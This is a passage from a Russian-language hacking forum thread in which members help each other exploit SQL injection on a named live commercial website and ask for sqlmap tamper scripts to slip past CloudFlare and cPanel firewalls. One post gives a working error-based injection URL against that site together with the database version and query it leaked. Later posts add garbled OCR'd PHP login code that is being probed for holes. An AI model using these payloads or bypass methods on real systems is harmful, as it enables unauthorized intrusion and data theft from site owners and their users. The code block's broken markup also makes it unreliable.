HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2391  
Старый 26.08.2018, 18:34
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию

это же просто detect WAF'a. Чем тут поможет обойти?
 
Ответить с цитированием

  #2392  
Старый 26.08.2018, 18:44
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от vikler  
vikler said:

это же просто detect WAF'a. Чем тут поможет обойти?
это разве не тампер ?

бля рили детект я нашёл думал тампер )

ггг сорян
 
Ответить с цитированием

  #2393  
Старый 26.08.2018, 21:31
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Подскажите как раскручивать sql-inj в таких ситуациях:

1) cPanel глушит почти что всё в 403-ию ошибку (HTTP Error 403 - Forbidden)

metroeyesng.com/?/product/online_store/&prd_id=11 (Параметр prd_id)

2) Есть ли в настоящий момент "действующие" tamper'ы sqlmap'a для обхода CloudFlare? (PS: выяснять реальный ip не подходит)

Или хотя бы рабочий пример какой-нибудь(
 
Ответить с цитированием

  #2394  
Старый 26.08.2018, 22:08
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию

Код:
Code:
http://metroeyesng.com/?/product/online_store/&prd_id=11'AND+polygon((select*from(select name_const(version(),1))x))+--+-
Код:
Code:
Illegal non geometric '(select `x`.`5.5.55-38.8-log` from (select NAME_CONST(version(),1) AS `5.5.55-38.8-log`) `x`)' value found during parsing
SELECT * FROM mc_product WHERE prd_store='online_store' AND prd_id='11'AND polygon((select*from(select name_const(version(),1))x)) -- -'
 
Ответить с цитированием

  #2395  
Старый 27.08.2018, 06:10
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Цитата:
Сообщение от joelblack  
joelblack said:

Код:
Code:
http://metroeyesng.com/?/product/online_store/&prd_id=11'AND+polygon((select*from(select name_const(version(),1))x))+--+-
Код:
Code:
Illegal non geometric '(select `x`.`5.5.55-38.8-log` from (select NAME_CONST(version(),1) AS `5.5.55-38.8-log`) `x`)' value found during parsing
SELECT * FROM mc_product WHERE prd_store='online_store' AND prd_id='11'AND polygon((select*from(select name_const(version(),1))x)) -- -'
А не подскажите как в таких ситуациях выводить БД/таблицы? А то пробовал и в hex загонять не выходит (толи руки не оттуда(( )
 
Ответить с цитированием

  #2396  
Старый 27.08.2018, 06:44
Тот_самый_Щуп
Guest
Сообщений: n/a
Провел на форуме:
47768

Репутация: 119
По умолчанию

joelblack,в чем смысл давать вектор с name_const? Тем более новичку.
 
Ответить с цитированием

  #2397  
Старый 28.08.2018, 16:29
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Есть тут уязвимость?

 
Ответить с цитированием

  #2398  
Старый 28.08.2018, 16:52
Тот_самый_Щуп
Guest
Сообщений: n/a
Провел на форуме:
47768

Репутация: 119
По умолчанию

Лол, плайнтекстом никак?

И смысл вырезать все "опасные" символы, когда mysql_real_escape_string() наше все? Дальше этот колхоз в виде картинки разглядывать не стал.
 
Ответить с цитированием

  #2399  
Старый 28.08.2018, 17:48
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Цитата:
Сообщение от Gorbachev  
Gorbachev said:

Лол, плайнтекстом никак?
И смысл вырезать все "опасные" символы, когда mysql_real_escape_string() наше все? Дальше этот колхоз в виде картинки разглядывать не стал.
От избытка свободного времени))) Прогнал его картинку в FineReader'e, для удобства других пользователей) Надеюсь без ошибок (разрешение картинки маловато...))

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
*[/
COLOR][COLOR="#0000BB"]©copyright Copyright[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]c[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]2016[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]Webmaster Studio[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]https[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.webmaster.md
[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]©version 3.0 Date[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]2016[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]04
[/COLOR][COLOR="#007700"]* @[/COLOR][COLOR="#0000BB"]link[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ws[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]lock[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php
?>
'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ar_define_langterms'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'MSG_ADMIN_WRONG_AUTH_DATA'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
else
{
[/COLOR][COLOR="#0000BB"]$us_data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$us_data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'block'[/COLOR][COLOR="#007700"]] )
{
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'auth_error'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ar_define_langterms'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'MSG_ADMIM_IS_BLOCKED'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
else
{
[/COLOR][COLOR="#FF8000"]// запоминаем пользователя.
[/COLOR][COLOR="#0000BB"]$login_crypt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]crypt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]Slogin[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$res_mem[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE ws_users SET login_crypt='[/COLOR][COLOR="#0000BB"]$login_crypt[/COLOR][COLOR="#DD0000"]', 'auth_date' = NOW() WHERE login='[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mem'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$login_crypt[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'image'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$us_data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'image'[/COLOR][COLOR="#007700"]];
}
}


}else{
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'auth_error'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ar_define_langterms'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'MSG_ADMIN_BAD_CAPTCHA'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
}
}

unset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'captcha_keystring'[/COLOR][COLOR="#007700"]]);

if([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_REFERER'[/COLOR][COLOR="#007700"]] )
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_REFERER'[/COLOR][COLOR="#007700"]]);
else
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: /ws/"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR] 
 
Ответить с цитированием

  #2400  
Старый 28.08.2018, 18:01
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Да нормальная там кариинка!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ